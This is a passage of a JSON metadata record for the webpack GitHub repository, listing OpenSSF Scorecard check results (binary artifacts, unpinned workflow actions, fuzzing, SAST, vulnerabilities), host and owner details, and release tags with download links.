protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.e